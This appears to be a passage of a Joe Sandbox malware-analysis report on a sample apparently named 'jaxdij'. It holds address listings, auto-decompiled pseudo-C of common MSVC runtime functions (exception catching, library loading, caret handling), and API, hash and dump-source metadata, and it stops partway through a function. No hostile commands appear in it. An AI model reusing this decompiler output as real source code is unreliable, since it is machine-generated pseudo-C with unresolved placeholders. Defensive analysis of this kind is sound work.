                                                                                                                          0x0024ee6e
                                                                                                                          0x0024ee75
                                                                                                                          0x0024ee77
                                                                                                                          0x00000000
                                                                                                                          0x0024ee7d
                                                                                                                          0x0024ee7d
                                                                                                                          0x0024ee81
                                                                                                                          0x0024ee85
                                                                                                                          0x0024ee85
                                                                                                                          0x0024ee87
                                                                                                                          0x0024ee89
                                                                                                                          0x0024ee8b
                                                                                                                          0x0024ee8d
                                                                                                                          0x0024ee8d
                                                                                                                          0x0024ee8d
                                                                                                                          0x0024ee90
                                                                                                                          0x0024ee90
                                                                                                                          0x0024ee97
                                                                                                                          0x0024ee99
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024ee99
                                                                                                                          0x0024ee77
                                                                                                                          0x0024ee55
                                                                                                                          0x0024ee33
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f225
                                                                                                                          0x0024f225
                                                                                                                          0x0024f228
                                                                                                                          0x0024f22b
                                                                                                                          0x00000000
                                                                                                                          0x0024f231
                                                                                                                          0x0024f231
                                                                                                                          0x0024f234
                                                                                                                          0x0024f238
                                                                                                                          0x0024f238
                                                                                                                          0x0024f23a
                                                                                                                          0x0024f23c
                                                                                                                          0x0024f23e
                                                                                                                          0x0024f240
                                                                                                                          0x0024f240
                                                                                                                          0x0024f240
                                                                                                                          0x0024f243
                                                                                                                          0x0024f243
                                                                                                                          0x0024f24a
                                                                                                                          0x0024f24c
                                                                                                                          0x00000000
                                                                                                                          0x0024f252
                                                                                                                          0x0024f252
                                                                                                                          0x0024f256
                                                                                                                          0x0024f25a
                                                                                                                          0x0024f25a
                                                                                                                          0x0024f25c
                                                                                                                          0x0024f25e
                                                                                                                          0x0024f260
                                                                                                                          0x0024f262
                                                                                                                          0x0024f262
                                                                                                                          0x0024f262
                                                                                                                          0x0024f265
                                                                                                                          0x0024f265
                                                                                                                          0x0024f26c
                                                                                                                          0x0024f26e
                                                                                                                          0x00000000
                                                                                                                          0x0024f274
                                                                                                                          0x0024f274
                                                                                                                          0x0024f278
                                                                                                                          0x0024f27c
                                                                                                                          0x0024f27c
                                                                                                                          0x0024f27e
                                                                                                                          0x0024f280
                                                                                                                          0x0024f282
                                                                                                                          0x0024f284
                                                                                                                          0x0024f284
                                                                                                                          0x0024f284
                                                                                                                          0x0024f287
                                                                                                                          0x0024f287
                                                                                                                          0x0024f28e
                                                                                                                          0x0024f290
                                                                                                                          0x00000000
                                                                                                                          0x0024f296
                                                                                                                          0x0024f296
                                                                                                                          0x0024f29a
                                                                                                                          0x0024f29e
                                                                                                                          0x0024f29e
                                                                                                                          0x0024f2a0
                                                                                                                          0x0024f2a2
                                                                                                                          0x0024f2a4
                                                                                                                          0x0024f2a6
                                                                                                                          0x0024f2a6
                                                                                                                          0x0024f2a6
                                                                                                                          0x0024f2a9
                                                                                                                          0x0024f2a9
                                                                                                                          0x0024f2b0
                                                                                                                          0x0024f2b2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f2b2
                                                                                                                          0x0024f290
                                                                                                                          0x0024f26e
                                                                                                                          0x0024f24c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e564
                                                                                                                          0x0024e567
                                                                                                                          0x0024e56a
                                                                                                                          0x00000000
                                                                                                                          0x0024e570
                                                                                                                          0x0024e577
                                                                                                                          0x0024e577
                                                                                                                          0x0024e579
                                                                                                                          0x0024e57d
                                                                                                                          0x0024e57f
                                                                                                                          0x0024e57f
                                                                                                                          0x0024e582
                                                                                                                          0x0024e582
                                                                                                                          0x0024e589
                                                                                                                          0x0024e58b
                                                                                                                          0x0024e599
                                                                                                                          0x0024e599
                                                                                                                          0x0024e59b
                                                                                                                          0x0024e59f
                                                                                                                          0x0024e5a1
                                                                                                                          0x0024e5a1
                                                                                                                          0x0024e5a4
                                                                                                                          0x0024e5a4
                                                                                                                          0x0024e5ab
                                                                                                                          0x0024e5ad
                                                                                                                          0x0024e5bb
                                                                                                                          0x0024e5bb
                                                                                                                          0x0024e5bd
                                                                                                                          0x0024e5c1
                                                                                                                          0x0024e5c3
                                                                                                                          0x0024e5c3
                                                                                                                          0x0024e5c6
                                                                                                                          0x0024e5c6
                                                                                                                          0x0024e5cd
                                                                                                                          0x0024e5cf
                                                                                                                          0x0024e5dd
                                                                                                                          0x0024e5dd
                                                                                                                          0x0024e5df
                                                                                                                          0x0024e5e3
                                                                                                                          0x0024e5e5
                                                                                                                          0x0024e5e5
                                                                                                                          0x0024e5e8
                                                                                                                          0x0024e5e8
                                                                                                                          0x0024e5ef
                                                                                                                          0x0024e5f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e5f1
                                                                                                                          0x0024e5cf
                                                                                                                          0x0024e5ad
                                                                                                                          0x0024e58b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e95f
                                                                                                                          0x0024e962
                                                                                                                          0x0024e965
                                                                                                                          0x00000000
                                                                                                                          0x0024e967
                                                                                                                          0x0024e967
                                                                                                                          0x0024e96a
                                                                                                                          0x0024e96e
                                                                                                                          0x0024e96e
                                                                                                                          0x0024e970
                                                                                                                          0x0024e972
                                                                                                                          0x0024e974
                                                                                                                          0x0024e976
                                                                                                                          0x0024e976
                                                                                                                          0x0024e976
                                                                                                                          0x0024e979
                                                                                                                          0x0024e979
                                                                                                                          0x0024e980
                                                                                                                          0x0024e982
                                                                                                                          0x00000000
                                                                                                                          0x0024e984
                                                                                                                          0x0024e984
                                                                                                                          0x0024e988
                                                                                                                          0x0024e98c
                                                                                                                          0x0024e98c
                                                                                                                          0x0024e98e
                                                                                                                          0x0024e990
                                                                                                                          0x0024e992
                                                                                                                          0x0024e994
                                                                                                                          0x0024e994
                                                                                                                          0x0024e994
                                                                                                                          0x0024e997
                                                                                                                          0x0024e997
                                                                                                                          0x0024e99e
                                                                                                                          0x0024e9a0
                                                                                                                          0x00000000
                                                                                                                          0x0024e9a2
                                                                                                                          0x0024e9a2
                                                                                                                          0x0024e9a6
                                                                                                                          0x0024e9aa
                                                                                                                          0x0024e9aa
                                                                                                                          0x0024e9ac
                                                                                                                          0x0024e9ae
                                                                                                                          0x0024e9b0
                                                                                                                          0x0024e9b2
                                                                                                                          0x0024e9b2
                                                                                                                          0x0024e9b2
                                                                                                                          0x0024e9b5
                                                                                                                          0x0024e9b5
                                                                                                                          0x0024e9bc
                                                                                                                          0x0024e9be
                                                                                                                          0x00000000
                                                                                                                          0x0024e9c0
                                                                                                                          0x0024e9c0
                                                                                                                          0x0024e9c4
                                                                                                                          0x0024e9c8
                                                                                                                          0x0024e9c8
                                                                                                                          0x0024e9ca
                                                                                                                          0x0024e9cc
                                                                                                                          0x0024e9ce
                                                                                                                          0x0024e9d0
                                                                                                                          0x0024e9d0
                                                                                                                          0x0024e9d0
                                                                                                                          0x0024e9d3
                                                                                                                          0x0024e9d3
                                                                                                                          0x0024e9da
                                                                                                                          0x0024e9dc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e9dc
                                                                                                                          0x0024e9be
                                                                                                                          0x0024e9a0
                                                                                                                          0x0024e982
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024ed79
                                                                                                                          0x0024ed7c
                                                                                                                          0x0024ed7f
                                                                                                                          0x00000000
                                                                                                                          0x0024ed85
                                                                                                                          0x0024ed85
                                                                                                                          0x0024ed88
                                                                                                                          0x0024ed8c
                                                                                                                          0x0024ed8c
                                                                                                                          0x0024ed8e
                                                                                                                          0x0024ed90
                                                                                                                          0x0024ed92
                                                                                                                          0x0024ed94
                                                                                                                          0x0024ed94
                                                                                                                          0x0024ed94
                                                                                                                          0x0024ed97
                                                                                                                          0x0024ed97
                                                                                                                          0x0024ed9e
                                                                                                                          0x0024eda0
                                                                                                                          0x00000000
                                                                                                                          0x0024eda6
                                                                                                                          0x0024eda6
                                                                                                                          0x0024edaa
                                                                                                                          0x0024edae
                                                                                                                          0x0024edae
                                                                                                                          0x0024edb0
                                                                                                                          0x0024edb2
                                                                                                                          0x0024edb4
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb9
                                                                                                                          0x0024edb9
                                                                                                                          0x0024edc0
                                                                                                                          0x0024edc2
                                                                                                                          0x00000000
                                                                                                                          0x0024edc8
                                                                                                                          0x0024edc8
                                                                                                                          0x0024edcc
                                                                                                                          0x0024edd0
                                                                                                                          0x0024edd0
                                                                                                                          0x0024edd2
                                                                                                                          0x0024edd4
                                                                                                                          0x0024edd6
                                                                                                                          0x0024edd8
                                                                                                                          0x0024edd8
                                                                                                                          0x0024edd8
                                                                                                                          0x0024eddb
                                                                                                                          0x0024eddb
                                                                                                                          0x0024ede2
                                                                                                                          0x0024ede4
                                                                                                                          0x00000000
                                                                                                                          0x0024edea
                                                                                                                          0x0024edea
                                                                                                                          0x0024edee
                                                                                                                          0x0024edf2
                                                                                                                          0x0024edf2
                                                                                                                          0x0024edf4
                                                                                                                          0x0024edf6
                                                                                                                          0x0024edf8
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfd
                                                                                                                          0x0024edfd
                                                                                                                          0x0024ee04
                                                                                                                          0x0024ee06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024ee06
                                                                                                                          0x0024ede4
                                                                                                                          0x0024edc2
                                                                                                                          0x0024eda0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f192
                                                                                                                          0x0024f195
                                                                                                                          0x0024f198
                                                                                                                          0x00000000
                                                                                                                          0x0024f19e
                                                                                                                          0x0024f19e
                                                                                                                          0x0024f1a1
                                                                                                                          0x0024f1a5
                                                                                                                          0x0024f1a5
                                                                                                                          0x0024f1a7
                                                                                                                          0x0024f1a9
                                                                                                                          0x0024f1ab
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1b0
                                                                                                                          0x0024f1b0
                                                                                                                          0x0024f1b7
                                                                                                                          0x0024f1b9
                                                                                                                          0x00000000
                                                                                                                          0x0024f1bf
                                                                                                                          0x0024f1bf
                                                                                                                          0x0024f1c3
                                                                                                                          0x0024f1c7
                                                                                                                          0x0024f1c7
                                                                                                                          0x0024f1c9
                                                                                                                          0x0024f1cb
                                                                                                                          0x0024f1cd
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1d2
                                                                                                                          0x0024f1d2
                                                                                                                          0x0024f1d9
                                                                                                                          0x0024f1db
                                                                                                                          0x00000000
                                                                                                                          0x0024f1e1
                                                                                                                          0x0024f1e1
                                                                                                                          0x0024f1e5
                                                                                                                          0x0024f1e9
                                                                                                                          0x0024f1e9
                                                                                                                          0x0024f1eb
                                                                                                                          0x0024f1ed
                                                                                                                          0x0024f1ef
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f4
                                                                                                                          0x0024f1f4
                                                                                                                          0x0024f1fb
                                                                                                                          0x0024f1fd
                                                                                                                          0x00000000
                                                                                                                          0x0024f203
                                                                                                                          0x0024f203
                                                                                                                          0x0024f207
                                                                                                                          0x0024f20b
                                                                                                                          0x0024f20b
                                                                                                                          0x0024f20d
                                                                                                                          0x0024f20f
                                                                                                                          0x0024f211
                                                                                                                          0x0024f213
                                                                                                                          0x0024f213
                                                                                                                          0x0024f213
                                                                                                                          0x0024f216
                                                                                                                          0x0024f216
                                                                                                                          0x0024f21d
                                                                                                                          0x0024f21f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f21f
                                                                                                                          0x0024f1fd
                                                                                                                          0x0024f1db
                                                                                                                          0x0024f1b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e55d
                                                                                                                          0x0024e09f
                                                                                                                          0x0024e096
                                                                                                                          0x0024e08d
                                                                                                                          0x0024e084
                                                                                                                          0x0024f665
                                                                                                                          0x0024f668
                                                                                                                          0x0024dfa2
                                                                                                                          0x00000000
                                                                                                                          0x0024dfa2
                                                                                                                          0x0024dfa0
                                                                                                                          0x0024df9e
                                                                                                                          0x00000000
                                                                                                                          0x0024dfa7
                                                                                                                          0x0024dfa7
                                                                                                                          0x0024dfa9
                                                                                                                          0x0024dfb0
                                                                                                                          0x00000000
                                                                                                                          0x0024dfb2
                                                                                                                          0x00000000
                                                                                                                          0x0024dfb0
                                                                                                                          0x0024df75
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024DF47
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0024DF4F
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024DFD8
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0024E003
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024E058
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          • Opcode ID: 9fd1a76da882fc6c5a6c02e7b71493a276e25f99e3ee27ad48c1766e065213b9
                                                                                                                          • Instruction ID: aaf2eeb50cd4e815a21a78d3ae5ab65333eff7fa3c23289b518b4320413cb7f7
                                                                                                                          • Opcode Fuzzy Hash: 9fd1a76da882fc6c5a6c02e7b71493a276e25f99e3ee27ad48c1766e065213b9
                                                                                                                          • Instruction Fuzzy Hash: C941E430A202099BCF14DF68CC85A9EBBB5BF45324F148055ED19AB392D771EE29CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00257EE7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E00257EE7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_t58 = E00251CAE(_t79, __ecx, __edx, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00251CAE(_t79, __ecx, __edx, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t4 =  &_a32; // 0x257ded
							_t70 = E0025434E(__edx, _t102, _t79, _a8, _a12, _a16, _a20, _a28,  *_t4);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						_t18 =  &_v40; // 0x257ded
						E002541FE(_t81, _t18,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t20 =  &_v40; // 0x257ded
						_t70 =  *_t20;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											_t37 =  &_a32; // 0x257ded
											E00257E67(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28,  *_t37);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00251C1C(_t79, _t81, _t93, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00256240(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00256240(_t65, _t83);
				}
			}






































                                                                                                                          0x00257ee7
                                                                                                                          0x00257ee7
                                                                                                                          0x00257ee7
                                                                                                                          0x00257eee
                                                                                                                          0x00257ef7
                                                                                                                          0x00258016
                                                                                                                          0x00257efd
                                                                                                                          0x00257efd
                                                                                                                          0x00257eff
                                                                                                                          0x00257f09
                                                                                                                          0x00257f0c
                                                                                                                          0x00257f12
                                                                                                                          0x00257f1c
                                                                                                                          0x00257f2e
                                                                                                                          0x00257f41
                                                                                                                          0x00257f46
                                                                                                                          0x00257f4b
                                                                                                                          0x00258012
                                                                                                                          0x00000000
                                                                                                                          0x00258013
                                                                                                                          0x00257f4b
                                                                                                                          0x00257f1c
                                                                                                                          0x00257f51
                                                                                                                          0x00257f54
                                                                                                                          0x00257f57
                                                                                                                          0x00257f5d
                                                                                                                          0x00257f71
                                                                                                                          0x00257f75
                                                                                                                          0x00257f7a
                                                                                                                          0x00257f7d
                                                                                                                          0x00257f80
                                                                                                                          0x00257f80
                                                                                                                          0x00257f83
                                                                                                                          0x00257f86
                                                                                                                          0x00257f8c
                                                                                                                          0x00257f92
                                                                                                                          0x00257f95
                                                                                                                          0x00257f98
                                                                                                                          0x00257fa7
                                                                                                                          0x00257fa8
                                                                                                                          0x00257fa8
                                                                                                                          0x00257fad
                                                                                                                          0x00257fc0
                                                                                                                          0x00257fc2
                                                                                                                          0x00257fc7
                                                                                                                          0x00257fd2
                                                                                                                          0x00257fd4
                                                                                                                          0x00257fd6
                                                                                                                          0x00257fd8
                                                                                                                          0x00257ff2
                                                                                                                          0x00257ff7
                                                                                                                          0x00257ffa
                                                                                                                          0x00257ffa
                                                                                                                          0x00257fd2
                                                                                                                          0x00257fc7
                                                                                                                          0x00258000
                                                                                                                          0x00258001
                                                                                                                          0x00258004
                                                                                                                          0x00258007
                                                                                                                          0x0025800a
                                                                                                                          0x0025800d
                                                                                                                          0x00257f98
                                                                                                                          0x00000000
                                                                                                                          0x00257f8c
                                                                                                                          0x00258017
                                                                                                                          0x0025801c
                                                                                                                          0x0025801d
                                                                                                                          0x0025801e
                                                                                                                          0x0025801f
                                                                                                                          0x0025802e
                                                                                                                          0x0025803e
                                                                                                                          0x00258045
                                                                                                                          0x0025804b
                                                                                                                          0x0025804c
                                                                                                                          0x00258058
                                                                                                                          0x0025805a
                                                                                                                          0x0025805a
                                                                                                                          0x00258069
                                                                                                                          0x00258069

                                                                                                                          APIs
                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00257DED,?,?,00000000,00000000,00000000,?), ref: 00257F0C
                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 00257FF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                          • String ID: MOC$RCC$}%$}%
                                                                                                                          • API String ID: 1435073870-4287355185
                                                                                                                          • Opcode ID: f2504528c80a4d2a33bcd1f376fc5f675f2458fdbdeebe03aade42da5af43a0e
                                                                                                                          • Instruction ID: 0c5ea56d34b45411435c1c93077ca9006e285b7ff83220b66625d1aa0d3b21c3
                                                                                                                          • Opcode Fuzzy Hash: f2504528c80a4d2a33bcd1f376fc5f675f2458fdbdeebe03aade42da5af43a0e
                                                                                                                          • Instruction Fuzzy Hash: F541793191020AAFCF25DF98DC81AAEBBB5FF08305F148099FE0467261D735A968DB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00249990 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CaretFocus$HideInvertRectReleaseShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4235554027-0
                                                                                                                          • Opcode ID: 77c2e330c1ef371bbd3df8d18ece3041bee48034c43f10168ab5ee0aeca41a3a
                                                                                                                          • Instruction ID: 4e5ae9a4268784eb7f5f647620b10e1836d89d4921065ccd6087775c44306a71
                                                                                                                          • Opcode Fuzzy Hash: 77c2e330c1ef371bbd3df8d18ece3041bee48034c43f10168ab5ee0aeca41a3a
                                                                                                                          • Instruction Fuzzy Hash: F831B674A04209EFCB04DFA8D588AAD7BF0BF08351F158469E889DB351D774EA94CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002523A9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002523A9(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x2660b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x25cae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x2660b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x2660b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00254A99(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00254A99(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                                                                                          0x002523b2
                                                                                                                          0x00252447
                                                                                                                          0x002523ba
                                                                                                                          0x002523bc
                                                                                                                          0x002523c6
                                                                                                                          0x002523cb
                                                                                                                          0x002523d8
                                                                                                                          0x002523ed
                                                                                                                          0x002523f1
                                                                                                                          0x00252457
                                                                                                                          0x0025245c
                                                                                                                          0x00252463
                                                                                                                          0x00252467
                                                                                                                          0x0025246a
                                                                                                                          0x0025246a
                                                                                                                          0x00252470
                                                                                                                          0x00252470
                                                                                                                          0x00252452
                                                                                                                          0x00252456
                                                                                                                          0x00252456
                                                                                                                          0x002523f3
                                                                                                                          0x002523fc
                                                                                                                          0x00252435
                                                                                                                          0x00252442
                                                                                                                          0x00252444
                                                                                                                          0x00252444
                                                                                                                          0x00000000
                                                                                                                          0x00252444
                                                                                                                          0x00252406
                                                                                                                          0x0025240b
                                                                                                                          0x00252410
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0025241a
                                                                                                                          0x0025241f
                                                                                                                          0x00252424
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00252429
                                                                                                                          0x0025242f
                                                                                                                          0x00252433
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00252433
                                                                                                                          0x002523d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002523d6
                                                                                                                          0x00252450
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,002524B6,?,00250FA5,00000000,00000000), ref: 0025246A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                          • Opcode ID: 621eb363d149714e4c81741781d98c17e5dbcd34fbc85661455c290dccdb0837
                                                                                                                          • Instruction ID: 18932966d4a6692860e80f839e085bd085c5d39a7c8b85b8ea79bdeba5400d1e
                                                                                                                          • Opcode Fuzzy Hash: 621eb363d149714e4c81741781d98c17e5dbcd34fbc85661455c290dccdb0837
                                                                                                                          • Instruction Fuzzy Hash: E6213071620213E7C7219F60EC48A5A7768EB16372F148121EC02A72D0F7B0FD2DC6D8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00251CBC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00251CBC(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x264064 != 0xffffffff) {
					_t24 = GetLastError();
